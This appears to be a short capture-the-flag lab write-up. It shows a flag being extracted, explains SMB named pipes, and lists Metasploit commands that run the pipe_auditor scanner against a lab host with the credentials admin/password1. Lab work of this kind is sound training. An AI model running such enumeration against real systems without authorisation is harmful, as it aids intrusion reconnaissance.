root@attackdefense:~# tar -xf flag.tar.gz
root@attackdefense:~# cat flag
🚩 Flag: 2727069bc058053bd561ce372721c92e
A named pipe is a logical connection between a client and a server inside an SMB connection, similar to an open TCP port.
Use pipe_auditor metasploit module to enumerate the named pipes
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set SMBUser admin
set SMBPass password1
set RHOSTS 192.174.58.6
exploit